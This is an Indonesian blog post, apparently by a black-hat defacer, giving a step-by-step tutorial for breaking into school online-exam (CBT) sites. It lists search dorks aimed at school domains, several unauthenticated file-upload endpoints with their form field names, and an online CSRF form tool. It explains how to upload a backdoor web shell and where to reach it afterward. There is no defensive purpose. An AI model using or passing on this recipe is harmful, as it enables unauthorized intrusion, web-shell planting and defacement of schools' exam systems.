Cara deface poc CBT
Assalamualaikum Wr.wb
Hallo Exploiter..
Perkenal kan saya ./M15T4K3
dari tim QUIXOTICXPLOIT di sini saya akan
Share tutorial cara deface Proff CBT
Oke.. langsung ke tutorial nya
CBT Vulnerability Upload Shell With Csrf
Bahan-bahan yang diperlukan :
- Hp / Pc
- Internet/Kuota Yang cukup(buat dorking nya:v)
- Shell Backdoor atau Mini Shell
- Script Heker Kalian
- Dork
- Csrf Online ( https://earthseed.space/csrf.php ) *Csrf yang sering saya pakai
Dork :
- inurl:/panel/pages/login.php site:.sch.id
- inurl:/login.php intitle:ujian online
- inurl:/login.php intitle:ujian sma
- inurl:/login.php intitle:ujian smp
- inurl:/login.php intitle:cbt beesmart
Exploit :
/panel/pages/upload-file.php
Postfile: uploadfile
/panel/pales/upload_jawab7.php
Postfile: uploadfile7
/panel/pages/upload_gambar.php
Postfile: uploadfile
/panel/pages/upload-logo.php
Postfile: uploadfile
Oke,. Lanjut
1. Kalian bisa pakai dork yang tadi saya siapkan atau dork hasil racikan kalian sendiri
Pilih target web yang menurut kalian vuln
Jika tampilan Blank atau seperti ss disini berarti tanda nya Vuln(bisa dikentot :v)
2. Kalo sudah kita copy link target(beserta Exploit) Dan letakkan pada Csrf Online
Untuk Postfile tergantung Exploit yang kita pakai tadi ya..
3. Kalo sudah Upload Shell kalian akan ada muncul Kata ( success ) pada halaman
Setelah itu silahkan akses shell kalian seperti dibawah ini :
/images/namashell.php
Atau bisa juga
/pictures/namashell.php
Dan boom! Terupload :V
Sekian tutorial dari saya
#Salam blekhet
Mantab bang
ReplyDelete